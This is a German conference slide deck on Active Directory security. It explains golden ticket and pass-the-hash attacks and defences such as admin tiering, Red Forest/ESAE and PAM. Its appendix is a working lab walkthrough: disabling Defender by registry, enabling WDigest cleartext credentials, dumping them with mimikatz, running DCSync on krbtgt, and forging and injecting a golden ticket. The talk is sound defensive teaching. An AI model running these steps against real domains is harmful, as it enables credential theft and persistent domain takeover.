folie 1 robin beismann nils kaczenski in roten und … · demo: typische domäne, golden ticket:...

www.michael-wessel.de

© 2018 Michael Wessel Informationstechnologie GmbH, Nils Kaczenski und Robin Beismann

Folie 1

In roten und goldenen Wäldern

Active Directory Security heute

Robin Beismann

Nils Kaczenski

Einleitung: Nils (5 Min.)



Folie 2

Ellen Bogen hat Besuch

Ellen Bogen

DC, DNS,

DHCP

DC, DNS,

WINS

Exchange SQL Server SQL Server

Datei ERP Proxy

Terminal Terminal Backup Management Intranet Support

FirewallDatei, DruckDatei, Druck

?

Johannes Beere

Unsere

Domäne ist

gehackt.



Folie 3

Robin BeismannNils Kaczenski



Folie 4



Folie 5

Los geht‘s!



Folie 6

Wie übernimmt man eine Domäne?



Folie 7

Wie übernimmt man eine Domäne? Nils (5 Min.) • Grundproblem: Standardaufbau und typische Betriebsweisen machen Angriffe zu leicht • Einbruch über Sicherheitslücken oder Social Engineering • Privilege Escalation und Lateral Movement • Golden Ticket ermöglicht dauerhaften Zugriff mit beliebigen Privilegien



Folie 8

… anfassen

Golden Ticket in einer typischen Domäne

Demo: Typische Domäne, Golden Ticket: Robin (10 Min.) • Domäne typisch.zz • Aufbau zeigen

• Standardgruppen • Helpdesk = Domänen-Admins

• Mimikatz - Golden Ticket (am Client) • User ist lokaler Admin • Greift Credentials von Helpdesk-Account ab • Erzeugt mit Dom-Admin-Rechten ein Golden Ticket • Beliebige Zugriffe möglich für 10 Jahre



Folie 9

Pass the Hash und Golden Ticket: Nils (5 Min.) Kerberos-Ablauf



Folie 10

Pass the Hash und Golden Ticket: Nils (5 Min.) • Mit Pass the Hash übernimmt man ein Konto, auch ohne das Kennwort im Klartext zu kennen • Grundansatz: Credentials von hochprivilegierten Konten abgreifen

• … dadurch reicht ein einziger "echter" Angriff, der Rest geschieht innerhalb des Netz-werks

• Prinzip Pass-the-Hash



Folie 11

Pass the Hash und Golden Ticket: Nils (5 Min.) • Das Golden Ticket verlängert einen einmaligen Angriff beliebig in die Zukunft • Dauerhafter Datenabfluss bzw. dauerhafte beliebige Manipulationen • Prinzip Golden Ticket

• GT erfordert Kommunikation mit dem DC, aber keine Anmeldung



Folie 12

Wie schützt man sich davor?

Admin Tiering und Red Forest: Nils (5 Min.)



Folie 13

Admin Tiering und Red Forest: Nils (5 Min.) • Admin Tiering teilt das Netzwerk in Sicherheitszonen auf • Jeder Admin-Account ist nur für die jeweilige Ebene gut



Folie 14

Admin Tiering und Red Forest: Nils (5 Min.) • Der Red Forest separiert die Tier-0-Adminkonten noch weiter • Angriff auf den Golden Forest ermöglicht keine vollständige Übernahme, weil die Tier-0-Kon-

ten nicht im Golden Forest liegen



Folie 15

… anfassen

Red Forest (herkömmlich)

Demo: Red Forest: Robin (7 Min.) • Domänen golden.zz und red.zz • Domänenaufbau golden.zz zeigen

• Standardgruppen = leer • AD-Delegation gezielt eingerichtet • Anmeldebeschränkungen per GPO • Trust zum Red Forest

• Domänenaufbau red.zz zeigen • Schattengruppen zur Administration des Golden Forest • Schatten-Accounts • Anmeldebeschränkungen per GPO



Folie 16

Hardening: Nils (3 Min.) • Zusätzliches Hardening ist nötig, damit das Konzept aufgeht • Vor allem: Sorgfalt im Operating



Folie 17

Was geht mit Windows Server 2016?



Folie 18

PAM in Windows Server 2016: Nils (3 Min.) • PAM erweitert das Red-Forest-Prinzip • Administrative Zugriffe nur zeitgesteuert und auf Antrag



Folie 19

… anfassen

Red Forest mit Windows Server 2016

Demo: PAM: Robin (7 Min.) • Domänen pamgold.zz und pamred.zz • Aufbau mit MIM zeigen • Administrationsbeispiel zeigen



Folie 20

Ellen Bogen schützt sich vor Besuch

Ellen Bogen

• Was ist ESAE?

• Wovor schützt ESAE?

• Wer braucht ESAE?

• Wie hoch ist der Aufwand?

?!

Zusammenfassung: Nils (5 Min.) • Grundprinzipien ESAE

• Trennung privilegierter bzw. kritischer Zugriffe von der Produktionsumgebung • Hohe operative Sorgfalt - keine Ausnahmen, Bequemlichkeit muss hintenanstehen • Logging und Monitoring

• Wovor schützt ESAE? • Vor erweiterten Angriffsszenarien, die typische Schlampigkeit und Designfehler aus-

nutzen … • … die aber durch vorhandene Tools und Anleitungen längst nicht nur für High-End-

Hacker möglich sind • Wer braucht ESAE?

• Minimal: Alle Umgebungen mit erhöhtem Sicherheitsbedarf • Sinnvoll: Alle Unternehmen, die in ihrem Netzwerk etwas zu schützen haben

• Wie hoch ist der Aufwand? • Hoch bis sehr hoch • Ein sauber geplantes Design ist nötig, gefolgt von einem Redesign bestehender Umge-

bungen



Folie 21

Danke an unsere Partner!

Platinum Sponsor

Gold Sponsoren



Folie 22

Danke an unsere Partner!

Gold Sponsoren



Folie 23

[email protected]

[email protected]



Anhang: Mit Mimikatz die Domäne übernehmen (Demo)

• Windows Defender abschalten (Registry) o HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender o Dword DisableAntiSpyware mit Wert 1

• Credentials eines Dom-Admins von einem PC stehlen - einfache Version, um es schnell zu zeigen o Auf dem Client, angemeldet als lokaler Admin o Registry Key setzen (ab Windows 8.1 erforderlich):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD), Wert 1 • Durch diesen Key verhält sich Windows 10 wie Windows 7 oder Windows 8, wo dieser

Schritt nicht nötig ist o Neu starten o Dom-Admin anmelden, angemeldet bleiben o Fast User Switching zu einem User mit lokalen Adminrechten o CMD als Admin

• mimikatz • privilege::debug • sekurlsa::logonpasswords

o Die Hashes und das Klartextkennwort des Dom-Admins werden angezeigt • Golden Ticket erzeugen - direkter Weg (Ticket sofort nutzen)

o CMD als Dom-Admin • mimikatz • privilege::debug • lsadump::dcsync /user:krbtgt • kerberos::golden /admin:JulesWinfield /domain:lab2019.faq-

o-matic.net /id:9999 /sid:S-1-5-21-2453261737-931746725-2009616223 /krbtgt:eb75bb744c1b820e2b6d7cffcea4152c /ptt

• exit • Ticket zeigen: klist o Funktion nachweisen:

• net use x: %logonserver%\c$ • x: • Wechseln auf den DC, dort compmgmt.msc und unter "Freigegebene Ordner" die Sit-

zungen anzeigen: Sitzung für Jules Winfield wird angezeigt, obwohl es den User gar nicht gibt

• Golden Ticket speichern und später verwenden o Schritt 1: Golden Ticket erzeugen und speichern

• CMD als Dom-Admin • mimikatz • privilege::debug • lsadump::dcsync /user:krbtgt • kerberos::golden /admin:JulesWinfield /domain:lab2019.faq-

o-matic.net /id:9999 /sid:S-1-5-21-2453261737-931746725-2009616223 /krbtgt:eb75bb744c1b820e2b6d7cffcea4152c /ticket:C:\Daten\Golden-Ticket.ticket

• exit o Schritt 2: Gespeichertes Ticket verwenden

• CMD als beliebiger (!) User • net use x: %logonserver%\c$ • Schlägt fehl - Credentials eine Dom-Admins fehlen • mimikatz • kerberos::ptt C:\Daten\Golden-Ticket.ticket • exit • klist

(zeigt Ticket für Jules Winfield)



• net use x: %logonserver%\c$ • x: • Wechseln auf den DC, dort compmgmt.msc und unter "Freigegebene Ordner" die Sit-

zungen anzeigen: Sitzung für Jules Winfield wird angezeigt, obwohl es den User gar nicht gibt

folie 1 robin beismann nils kaczenski in roten und … · demo: typische domäne, golden ticket:...

Documents